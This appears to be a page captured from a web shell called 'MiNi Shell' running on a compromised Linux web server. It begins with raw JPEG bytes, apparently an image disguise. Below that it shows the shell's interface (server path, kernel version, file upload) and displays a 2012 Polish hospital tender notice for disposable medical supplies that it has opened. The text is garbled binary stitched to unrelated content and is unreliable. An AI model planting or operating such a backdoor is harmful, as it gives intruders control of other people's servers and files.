JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121214/265969-N-2012.html

<p class="kh_header"><b>Lubartów: dostawy sprzętu medycznego jednorazowego użytku</b><br>
<b>Numer ogłoszenia: 265969 - 2012; data zamieszczenia: 14.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul.  Cicha 14, 21-100 Lubartów, woj. lubelskie, tel. 81 855 66 08, faks 81 855 66 08.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawy sprzętu medycznego jednorazowego użytku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia stanowią dostwy sprzętu medycznego jednorazowego użytku w ilościach i asortymencie określonym w Załączniku nr 1 do SIWZ. ( w podziale na zadania):
Zadania 1 - 25.
2.Wspólny Słownik Zamówień (CPV) : 33140000-3 - materiały medyczne.
3.Dopuszcza się składanie ofert częściowych.
4.Nie dopuszcza się składania ofert równoważnych.
5.Zamawiający wymaga aby termin ważności na dostarczany przedmiot zamówienia wynosił min. 12 miesięcy licząc od daty dostawy towaru do siedziby Zamawiającego.
6. Zamawiający dopuszcza zaoferowanie innych wielkości opakowań niż opisane  w tabeli, wówczas należy tak przeliczyć ilość oferowanych opakowań, aby w efekcie możliwa była realizacja całości zamówienia. W razie konieczności należy zaokrąglić ilość zaproponowanych opakowań w górę.
7.Zamawiający wymaga, aby sprzęt sterylny jednorazowgo użytku oraz sprzęt biologicznie czysty jednorazowego użytku spełniał następujace kryteria:
 Każdy asortyment musi być zapakowany oddzielnie ( pojedynczo)
Na każdym pojedynczym opakowaniu musí byc umieszczona data ważności.
 Na każdym pojedynczym opakowaniu musí być zaznaczone, że jest to produkt sterylny,   
         jednorazowego użytku
Na każdym pojedynczym opakowaniu musi być zaznaczone, że jest to produkt biologicznie czysty,    jednorazowego użytku.

8.W celu oceny jakości oraz zgodności z SIWZ dostarczanych wyrobów, Zamawiający wymaga złożenia próbek, w ilościach wskazanych poniżej (dostarczone próbki nie podlegaja zwrotowi) :



Zadanie 1.

Nazwa
Jednostka miary
Wymagana ilość próbek
1
Probówki jałowe na posiew moczu ( uromedium)
sztuka
3

Zadanie 2.

Nazwa
Jednostka miary
Wymagana ilość próbek
1
Probówki wymazówki do posiewów bakteriologicznych
Sterylne, długość 12 - 15 cm, opakowanie zbiorcze max 100 szt.
sztuka
5

Zadanie nr 5.

Nazwa
Jednostka miary
Wymagana ilość próbek
1
Cewnik Foley CH= 12, balon 5 - 10 ml. sterylny, dwudrożny, jednorazowego użytku, lateksowy, obustronnie silikonowany.  Atraumatyczne wprowadzenie cewnika do krótkiego lub średniego zastosowania , w linii bocznej dwa otwory, uniwersalne ujście kanału głównego kompatybilne ze standardowymi łącznikami worków. Na cewniku podany jest   rozmiar cewnika i pojemność balonu. Plastikowa zastawka zaworu uszczelniającego dostosowana do strzykawki typu Luer. 
 Opakowanie wewnętrzne folia, zewnętrzne blister-pack
sztuka
3
2
Cewnik Foley CH=14, balon 5-10 ml. sterylny, dwudrożny, jednorazowego użytku, lateksowy, obustronnie silikonowany.  Atraumatyczne wprowadzenie cewnika do krótkiego lub średniego zastosowania , w linii bocznej dwa otwory, uniwersalne ujście kanału głównego kompatybilne ze standardowymi łącznikami worków. Na cewniku podany jest   rozmiar cewnika i pojemność balonu. Plastikowa zastawka zaworu uszczelniającego dostosowana do strzykawki typu Luer. 
moczowym. Opakowanie wewnętrzne folia, zewnętrzne blister-pack.
sztuka
3
3
Cewnik Foley CH=16  balon 5-10 ml. sterylny, dwudrożny, jednorazowego użytku, lateksowy, obustronnie silikonowany.  Atraumatyczne wprowadzenie cewnika do krótkiego lub średniego zastosowania , w linii bocznej dwa otwory, uniwersalne ujście kanału głównego kompatybilne ze standardowymi łącznikami worków. Na cewniku podany jest   rozmiar cewnika i pojemność balonu. Plastikowa zastawka zaworu uszczelniającego dostosowana do strzykawki typu Luer. 
Opakowanie wewnętrzne folia, zewnętrzne blister-pack.
sztuka
3
4
Cewnik Foley CH= 18 balon 5-10 ml. sterylny, dwudrożny, jednorazowego użytku, lateksowy, obustronnie silikonowany.  Atraumatyczne wprowadzenie cewnika do krótkiego lub średniego zastosowania , w linii bocznej dwa otwory, uniwersalne ujście kanału głównego kompatybilne ze standardowymi łącznikami worków. Na cewniku podany jest   rozmiar cewnika i pojemność balonu. Plastikowa zastawka zaworu uszczelniającego dostosowana do strzykawki typu Luer. 
Opakowanie wewnętrzne folia, zewnętrzne blister-pack
sztuka
3
5
Cewnik Foley CH= 20 balon 5-10 ml. sterylny, dwudrożny, jednorazowego użytku, lateksowy, obustronnie silikonowany.  Atraumatyczne wprowadzenie cewnika do krótkiego lub średniego zastosowania , w linii bocznej dwa otwory, uniwersalne ujście kanału głównego kompatybilne ze standardowymi łącznikami worków. Na cewniku podany jest   rozmiar cewnika i pojemność balonu. Plastikowa zastawka zaworu uszczelniającego dostosowana do strzykawki typu Luer. 
Opakowanie wewnętrzne folia, zewnętrzne blister-pack
sztuka
3
6
Cewnik Foley CH= 20, balon 30-50 ml. Sterylny, dwudrożny, jednorazowego użytku, lateksowy, obustronnie silikonowany.  Atraumatyczne wprowadzenie cewnika do krótkiego lub średniego zastosowania , w linii bocznej dwa otwory, uniwersalne ujście kanału głównego kompatybilne ze standardowymi łącznikami worków. Na cewniku podany jest   rozmiar cewnika i pojemność balonu. Plastikowa zastawka zaworu uszczelniającego dostosowana do strzykawki typu Luer. 
Opakowanie wewnętrzne folia, zewnętrzne blister-pack
sztuka
3

Zadanie 6.

Nazwa
Jednostka miary
Wymagana ilość próbek
1
Wysoko podciśnieniowy sterylny Redon system drenażowania  ran 150 ml-służy do odprowadzania krwi lub wydzieliny z ran i jam ciała. Wyposażony we wskaźnik podciśnienia i przełącze Lver-Lock dla węża łączącego z zaciskiem przesuwnym i nastawnym łącznikiem drenu CH 6-18
sztuka
1
2
Wysoko podciśnieniowy sterylny Redon system drenażowania  ran 300 ml-służy do odprowadzania krwi lub wydzieliny z ran i jam ciała. Wyposażony we wskaźnik podciśnienia i przełącze Lver-Lock dla węża łączącego z zaciskiem przesuwnym i nastawnym łącznikiem drenu CH 6-18
sztuka
1
3
Wysoko podciśnieniowy sterylny Redon system drenażowania  ran 600 ml-służy do odprowadzania krwi lub wydzieliny z ran i jam ciała. Wyposażony we wskaźnik podciśnienia i przełącze Lver-Lock dla węża łączącego z zaciskiem przesuwnym i nastawnym łącznikiem drenu CH 6-18
sztuka
1
4
Dren Redona-pooperacyjny dren wykonany z medycznej odmiany PCV z optymalnym współczynnikiem twardości zapewniającym drożność drenu przy jednoczesnym zachowaniu wysokiego stopnia  atraumatynności (atraumatynne) zakończenie pakowany podłużnie, szerokość od 6 do 22 mm, otwory boczne o śr. nie mniejszej niż 2 mm, dł. 50-70 cm, sterylny
sztuka
1
5
Dren brzuszny-wykonany z silikonowego tworzywa o optymalnie dobranej sprężystości i giętkości z otworami bocznymi, linia  radiop. Na całej długości drenu dł. 40-50 cm, szerokość od 20 do 36 mm, pakowany podłużnie, sterylny
sztuka
1
6
Kateter do odsysania pola operacyjnego-wykonany z przezroczystego materiału co umożliwia obserwację odsysanej treści..Końcówka  typu yankauera  bez kontroli siły ssania, zagięta pod kątem 90 stopni; dł. Drenu 300 cm, z łącznikiem 8/8; znakowany na kolor niebieski 
sztuka
1
7
Kateter do odsysania pola operacyjnego-wykonany z przezroczystego materiału co umożliwia obserwację odsysanej treści..Końcówka  typu yankauera  bez kontroli siły zsania, zagięta pod kątem 90 stopni; Wersja z końcówką cienką 22 F; dł. Drenu 300 cm znakowany na kolor niebieski
sztuka
1

Zadanie 9.

Nazwa
Jednostka miary
Wymagana ilość próbek
1
Zestaw ortopedyczny paco-flow do odsysania pola operacyjnego zestaw składa się z końcówki ssącej oraz drenu łączącego o standardowej długości 250cm.Dren o standardowej średnicy 56.5/10 mm. Dren ze wzmocnieniem wzdłużnym zapobiegającym  zasysaniu oraz dwoma uniwersalnymi łącznikami przeciwzagięciowymi. Końcówka ssąca paco-flow o kilkuelementowej konstrukcji z wbudowanym w rączkę specjalnym wymiennym filtrem automatycznie wychwytującym wszelkie zanieczyszczenia stałe oraz niemal bez oporów przepuszczających  treść płynną.
sztuka
1

Zadanie 12.

Nazwa
Jednostka miary
Wymagana ilość próbek
1
Filtr oddechowy dla dorosłych, bakteryjno - wirusowy, elektrostatyczny o minimalnej skuteczności filtracji bakteryjnej i wirusowej min. 99,999%, opór przepływu do 2,2 cm H20 przy 60 l / min., sterylny,  masa do 23g, port kapno zabezpieczony koreczkiem zaciskowym, do użytku 24-godzinnego.
sztuka
1

Zadanie 14.

Nazwa
Jednostka miary
Wymagana ilość próbek
1
Igły podpajęczynówkowe z prowadnicą G25/90
sztuka
1
2
Igły podpajęczynówkowe z prowadnicą G26/90
sztuka
1
3
Igły podpajęczynówkowe z prowadnicą G27/90
sztuka
1
4
Igły podpajęczynówkowe bez prowadnicy G20/90
sztuka
2
5
Igły podpajęczynówkowe bez prowadnicy G22/90
sztuka
2
6
Igły podpajęczynówkowe bez prowadnicy G23/90
sztuka
2
7
Igły podpajęczynówkowe bez prowadnicy G24/90
sztuka
2

Zadanie 15.

Nazwa
Jednostka miary
Wymagana ilość próbek
1
Ostrze  nr  10 kompatybilne z trzonkiem nr  3
Jednorazowego użytku, wykonane ze stali węglowej
sztuka
5
2
Ostrze nr 11 kompatybilne z trzonkiem nr 3
Jednorazowego użytku, wykonane ze stali węglowej
sztuka
5
3
Ostrze nr 12 kompatybilne z trzonkiem nr 3
Jednorazowego użytku, wykonane ze stali węglowej
sztuka
5
4
Ostrze  nr 20 kompatybilne z trzonkiem nr 4
Jednorazowego użytku, wykonane ze stali węglowej
sztuka
5
5
Ostrze  nr 22 kompatybilne  z  trzonkiem nr 4
Jednorazowego użytku, wykonane ze stali węglowej
sztuka
5
6
Ostrze nr 23 kompatybilne z trzonkiem nr 4
Jednorazowego użytku, wykonane ze stali węglowej
sztuka
5
7
Ostrze nr 24 kompatybilne z trzonkiem nr 4
Jednorazowego użytku, wykonane ze stali węglowej
sztuka
5

	Zadanie  20.

Nazwa
Jednostka miary
Wymagana ilość próbek
1
Kaniula do długotrwałego podawania płynów i leków z dodatkowym portem do iniekcji wykonana z PTFE. Kaniula  18G, 1,3 x 45 mm - zielona,
sztuka
3
2
Kaniula do długotrwałego podawania płynów i leków z dodatkowym portem do iniekcji wykonana z PTFE. Kaniula  20G, 1,1 x 33 mm - różowy
sztuka
3
3
Kaniula do długotrwałego podawania płynów i leków z dodatkowym portem do iniekcji wykonana z PTFE.  Kaniula 22G,  0,9 x 25 mm - niebieska
sztuka
3
4
Kaniula do długotrwałego podawania płynów i leków z dodatkowym portem do iniekcji wykonana z PTFE.  Kaniula 24G,  0,7 x 19 mm - żółta
sztuka
3
5
Kaniula pediatryczna typu Neoflon.  Kaniula  24G, 0,7x19 mm - żółta
sztuka
2
6
Kaniula pediatryczna typu Neoflon.  Kaniula  26G, 0,6 x 19mm - fioletowa
sztuka
2
7
Kaniula dotętnicza  z zaworem odciągającym. Kaniula 20G/110x45mmczerwona
sztuka
2

Zadanie 23.

Nazwa
Jednostka miary
Wymagana ilość próbek
1
Jałowy cewnik do odsysania górnych dróg oddechowych z atraumatycznym okrągłym otworem końcowym oraz dwoma naprzeciwległymi otworami odbarczającymi. Rozmiar 14.
sztuka
5
2
Jałowy cewnik do odsysania górnych dróg oddechowych z atraumatycznym okrągłym otworem końcowym oraz dwoma naprzeciwległymi otworami odbarczającymi. Rozmiar 16.
sztuka
5

Próbki winny znajdować się w oddzielnym opakowaniu niż oferta .

Paczka z próbkami winna być oznaczona : 
Próbki do przetargu nieograniczonego na dostawy sprzętu medycznego jednorazowego użytku. 
SZP*40-2012. 
Wewnątrz należy umieścić informacje o nazwie i adresie Wykonawcy oraz informację, których zadań próbki dotyczą. 
Próbki  należy złożyć  w Sekretariacie SP ZOZ w Lubartowie  ul. Cicha 14  21-100 Lubartów do dnia  28.12. 2012 r. do godz. 11.00..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 25.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Do oferty należy dołączyć oświadczenie, o posiadaniu wszelkich wymaganych dla danego towaru dokumentów dopuszczających do stosowania na rynku polskim (np. deklaracja zgodności lub wpis do rejestru wyrobów medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używanie lub inny dokument równoważny) - Załącznik nr 5 do SIWZ. Na każde pisemne żądanie Zamawiającego Wykonawca zobowiązuje się udostępnić dokument  do wglądu.
2.	Katalogi, prospekty, foldery zawierające dokładne opisy zaoferowanego sprzętu w języku polskim wraz z zaznaczeniem oferowanych pozycji.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz-lubartow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Lubartowie, ul. Cicha 14, 21-100 Lubartów, Sekcja Zamówień Publicznych i Zaopatrzenia pokój nr 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2012 godzina 11:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Lubartowie, ul. Cicha 14, 21-100 Lubartów, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cewniki Foley.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kaniule.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadania 1,2,3,4,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cały asortyment z wyłączeniem cewników Foleya i kaniul..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com